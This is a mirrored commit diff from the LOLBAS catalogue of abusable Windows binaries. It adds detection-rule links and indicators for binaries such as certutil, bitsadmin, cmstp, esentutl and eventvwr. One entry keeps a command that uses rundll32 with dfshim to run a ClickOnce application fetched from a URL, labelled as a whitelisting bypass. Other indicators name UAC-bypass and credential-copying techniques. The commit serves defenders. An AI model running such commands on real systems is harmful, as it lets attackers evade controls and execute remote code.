mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-15 00:01:18 +01:00
Detection Resources and Other Updates (#179)
* Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
parent
2031916b1a
commit
23dd0236ae
@ -26,6 +26,11 @@ Code_Sample:
|
|||||||
Detection:
|
Detection:
|
||||||
- IOC: Event ID 10
|
- IOC: Event ID 10
|
||||||
- IOC: binary.exe spawned
|
- IOC: binary.exe spawned
|
||||||
|
- Analysis: https://link/to/blog/gist/writeup/if/applicable
|
||||||
|
- Sigma: https://link/to/sigma/rule/if/applicable
|
||||||
|
- Elastic: https://link/to/elastic/rule/if/applicable
|
||||||
|
- Splunk: https://link/to/splunk/rule/if/applicable
|
||||||
|
- BlockRule: https://link/to/microsoft/block/rules/if/applicable
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://blogpost.com
|
- Link: http://blogpost.com
|
||||||
- Link: http://twitter.com/something
|
- Link: http://twitter.com/something
|
||||||
|
@ -13,6 +13,7 @@ Commands:
|
|||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
||||||
|
Detection:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/notwhickey/status/1333900137232523264
|
- Link: https://twitter.com/notwhickey/status/1333900137232523264
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Sysmon Event ID 1 - Process Creation
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||||
|
@ -15,8 +15,9 @@ Full_Path:
|
|||||||
- Path: C:\WINDOWS\System32\At.exe
|
- Path: C:\WINDOWS\System32\At.exe
|
||||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Scheduled task is created
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_interactive_at.yml
|
||||||
- IOC: Windows event log - type 3 login
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_atsvc_task.yml
|
||||||
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
||||||
- IOC: C:\Windows\Tasks\At1.job
|
- IOC: C:\Windows\Tasks\At1.job
|
||||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||||
|
@ -17,6 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
|
||||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||||
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
|
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
|
||||||
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
|
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
|
||||||
|
@ -38,6 +38,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Child process from bash.exe
|
- IOC: Child process from bash.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
|
@ -38,6 +38,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/90ca1a8ad2e5c96d09a9ae4ff92483a2110d49ff/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/abcaf00aeef3769aa2a6f66f7fb6537b867c1691/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/e40b8592544721c689f8ae96477ea1218e4c7a05/rules/windows/process_creation/win_monitoring_for_persistence_via_bits.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml
|
||||||
- IOC: Child process from bitsadmin.exe
|
- IOC: Child process from bitsadmin.exe
|
||||||
- IOC: bitsadmin creates new files
|
- IOC: bitsadmin creates new files
|
||||||
- IOC: bitsadmin adds data to alternate data stream
|
- IOC: bitsadmin adds data to alternate data stream
|
||||||
|
@ -24,6 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/406f10b583469f7f7c245ff41002f75902693b7d/rules/windows/process_creation/process_creation_certoc_execution.yml
|
||||||
- IOC: Process creation with given parameter
|
- IOC: Process creation with given parameter
|
||||||
- IOC: Unsigned DLL load via certoc.exe
|
- IOC: Unsigned DLL load via certoc.exe
|
||||||
- IOC: Network connection via certoc.exe
|
- IOC: Network connection via certoc.exe
|
||||||
|
@ -52,6 +52,14 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_certutil_encode.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/e9260679d4aeae7f696001c5b14d318d31c8f076/rules/windows/process_creation/process_creation_root_certificate_installed.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml
|
||||||
- IOC: Certutil.exe creating new files on disk
|
- IOC: Certutil.exe creating new files on disk
|
||||||
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
||||||
- IOC: Useragent CertUtil URL Agent
|
- IOC: Useragent CertUtil URL Agent
|
||||||
|
@ -24,7 +24,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||||
- IOC: cmd.exe executing files from alternate data streams.
|
- IOC: cmd.exe executing files from alternate data streams.
|
||||||
|
- IOC: cmd.exe creating/modifying file contents in an alternate data stream.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
|
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Usage of this command could be an IOC
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
||||||
|
@ -15,6 +15,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\System32\cmdl32.exe
|
- Path: C:\Windows\System32\cmdl32.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmdl32.exe
|
- Path: C:\Windows\SysWOW64\cmdl32.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/3416db73016f25ce115f5597fe74320d2428db66/rules/windows/process_creation/win_pc_susp_cmdl32_lolbas.yml
|
||||||
- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
|
- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
|
||||||
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
|
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -24,8 +24,14 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
|
||||||
- IOC: Cmstp.exe communication towards internet and getting files
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
|
- IOC: Execution of cmstp.exe without a VPN use case is suspicious
|
||||||
|
- IOC: DotNet CLR libraries loaded into cmstp.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - cmstp.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/NickTyrer/status/958450014111633408
|
- Link: https://twitter.com/NickTyrer/status/958450014111633408
|
||||||
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
||||||
|
@ -17,7 +17,14 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Control.exe executing files from alternate data streams.
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||||
|
- IOC: Control.exe executing files from alternate data streams
|
||||||
|
- IOC: Control.exe executing library file without cpl extension
|
||||||
|
- IOC: Suspicious network connections from control.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
||||||
- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
|
- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
|
||||||
|
@ -24,7 +24,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
|
||||||
|
- IOC: Csc.exe should normally not run as System account unless it is used for development.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -17,7 +17,16 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Cscript.exe executing files from alternate data streams
|
- IOC: Cscript.exe executing files from alternate data streams
|
||||||
|
- IOC: DotNet CLR libraries loaded into cscript.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - cscript.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||||
|
@ -16,6 +16,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
|
- Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/dc030e0128a38510b0a866e1210f5ebd7c418c0b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml
|
||||||
- IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
|
- IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
|
||||||
- IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
|
- IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
|
||||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
|
||||||
|
@ -16,6 +16,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_desktopimgdownldr.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/win_susp_desktopimgdownldr_file.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
|
||||||
- IOC: desktopimgdownldr.exe that creates non-image file
|
- IOC: desktopimgdownldr.exe that creates non-image file
|
||||||
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
|
|||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||||
Description: Executes click-once-application from Url
|
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||||
Usecase: Use binary to bypass Application whitelisting
|
Usecase: Use binary to bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -19,7 +19,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||||
|
@ -24,8 +24,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
|
||||||
- IOC: Child process from diskshadow.exe
|
- IOC: Child process from diskshadow.exe
|
||||||
- IOC: Diskshadow reading input from file
|
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
|
- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -17,7 +17,14 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_dllhost_net_connections.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/552b67da9452fb0765e3624b3d6e3ef6c0508bda/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/c457614e37bf7b6db02de84c7fa71a5620783236/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml
|
||||||
|
- IOC: DotNet CLR libraries loaded into dllhost.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - dllhost.exe.log
|
||||||
|
- IOC: Suspicious network connectings originating from dllhost.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/CyberRaiju/status/1167415118847598594
|
- Link: https://twitter.com/CyberRaiju/status/1167415118847598594
|
||||||
- Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
|
- Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
|
||||||
|
@ -17,7 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Dnscmd.exe loading dll from UNC path
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
|
||||||
|
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
||||||
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
||||||
|
@ -52,7 +52,12 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||||
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
||||||
|
@ -17,6 +17,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml
|
||||||
- IOC: eventvwr.exe launching child process other than mmc.exe
|
- IOC: eventvwr.exe launching child process other than mmc.exe
|
||||||
- IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command
|
